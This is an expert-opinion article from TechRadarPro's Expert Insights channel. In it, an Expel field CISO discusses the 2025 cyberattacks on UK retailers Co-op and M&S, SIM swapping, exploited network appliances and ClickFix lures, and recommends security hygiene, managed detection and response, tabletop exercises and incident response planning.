The resilient retailer’s guide to proactive cyber defense
Recently, a spate of high-profile, malicious cyberattacks on the retail sector has thrust the risks of a breach into the spotlight once more.
In April, Co-op disabled its IT systems to prevent attackers from installing malware. Since then, the company has faced problems with ordering and stock management, although spokespeople say they avoided the worst outcomes of the breach.
Attackers hit fellow retailer M&S even harder. M&S stopped accepting online orders, leaving shelves bare, following a successful cyberattack. The company is still navigating the aftermath of the breach, estimating business operations won’t return to normal for months.
The common thread between these high-profile retail breaches? Attackers used employee data to execute SIM swaps and gain system entry—a tactic that’s growing in popularity at an alarming rate.
Field CISO, Expel.
SIM swapping involves attackers using stolen personal information to impersonate individuals and contacting their mobile carriers, fraudulently claiming to need a new SIM card due to loss or damage.
If they’re successful, the mobile carrier then transfers the victim’s mobile number to the new SIM card and delivers it to the attacker, allowing the attacker to bypass two-factor authentication and gain access to the victim’s accounts.
The National Fraud Database reports a 1,055% increase in SIM swapping attacks in 2024. Unsurprisingly, SIM swapping falls under the “identity-based” attack umbrella, which is consistently the largest threat organizations face year-over-year, accounting for 66.2% of all security incidents among Expel customers in Q1 2025 alone.
With M&S confirming that human error caused the fallout, it’s clear attackers continue to exploit human—and credential-based vulnerabilities—leaving organizations at risk for potentially catastrophic financial and reputational loss.
The rise of vulnerabilities in internet-facing network appliances
Out of the threats Expel observed in Q1 this year, 20.9% were non-targeted malware attacks—many of which were delivered through misconfigured or exposed appliances, such as firewalls and VPNs.
Exploited appliances are likely used as broad entry points, not just in targeted attacks, but also through mass scanning and opportunistic exploitation of common misconfigurations or vulnerabilities. These appliances normally create a protective barrier for systems, but can provide a springboard for attackers when compromised.
Elsewhere, ClickFix techniques—where attackers manipulate users into executing malicious code via fake update-prompting pop-ups—contributed to 51% of all malware incidents and 78% of all infostealer malware incidents that we observed in Q1 this year. This includes the likes of CAPTCHA and QR codes, which trick users into infecting their own computers.
The increased use of these techniques reveals how relatively easy vulnerable endpoints can be turned against an organization. Even seemingly small user interactions, or passing appliance misuses, can result in code execution, turning protective systems like VPNs and firewalls into liabilities.
Enhancing security hygiene and reducing risks
Robust security hygiene is vital for protecting critical systems, as it only takes one lapse to create critical access points for threat actors.
Regularly updating systems and emphasizing security hygiene among employees can reduce exposure to threats. For example, organizations should enforce the use of the best password managers for all employees, including contractors or freelancers. Exercising security best practices helps ensure that the org isn’t an easy target for attackers, and could even encourage them to move on to different targets.
Businesses can also consider using managed detection and response (MDR) services to ensure that threats can be identified, prioritized and resolved efficiently, whilst any suspicious activity can be spotted, flagged and dealt with. It’s now more a matter of when, not if, attackers get in, and having the ability to identify and neutralize threats quickly is critical for minimizing business disruption.
This is so true that when I was at Microsoft, we had a mantra in everything we did in cyber. “Assume breach. Design your environment with the assumption that attackers will succeed.” This changes the perspective of cybersecurity completely.
To stay ahead of threats, it’s imperative that security and IT management sets aside time to run tabletop simulations of real-world cyber incidents, bringing key stakeholders across the business—think CFOs, communications managers, CEOs— come together to practice incident response in a collaborative way.
This focuses on decision-making and processes, and tests an organization’s response plan by identifying gaps, reinforcing team roles and enhancing communication. These exercises help an organization build and develop its own incident response muscle, helping tame the intense stress that can be seen during an actual cyber incident.
Why businesses need a cybersecurity playbook
Regardless of the layered protection organizations put in place, the ever-increasing threat of credential-based attacks means that a cyberattack can—and most likely will—still occur.
Therefore having concrete and stress-tested plans for incident response in place is pivotal. This means having visibility into the affected systems, and the ability to both contain and mitigate successful attacks.
These recent incidents are a reminder of the potentially devastating, long-term business impacts that result from successful attacks.
M&S, for example, estimated that its loss of profits from this security incident would total approximately £300 million once it fully restores its services.
Co-op reacted quickly, taking its IT systems offline when its security team detected attackers in their system. As a result, Co-op is reportedly recovering faster than M&S, proving that a proactive, coordinated, and predetermined security plan can save companies millions.
These recent examples of UK retailers emphasize the pressing need for organizations to be prepared for abnormal access behaviors and credential misuse.
Act now, save later
The data shows that attackers are targeting identity tools, exploiting misconfigured systems, and using automation to scale their attacks. In a new age of cyber threats, reactive security is no longer viable.
Businesses must ensure that their networks are protected, maintained, and consistently patched to quell the rise of cyberattacks before they get worse. It’s time businesses treat network security as a strategic and operational priority, not simply an exercise in compliance.
We list the best online cybersecurity courses.
This article was produced as part of TechRadarPro’s Expert Insights channel where we feature the best and brightest minds in the technology industry today. The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/news/submit-your-story-to-techradar-pro
Recently, a spate of high-profile, malicious cyberattacks on the retail sector has thrust the risks of a breach into the spotlight once more. In April, Co-op disabled its IT systems to prevent attackers from installing malware. Since then, the company has faced problems with ordering and stock management, although spokespeople…
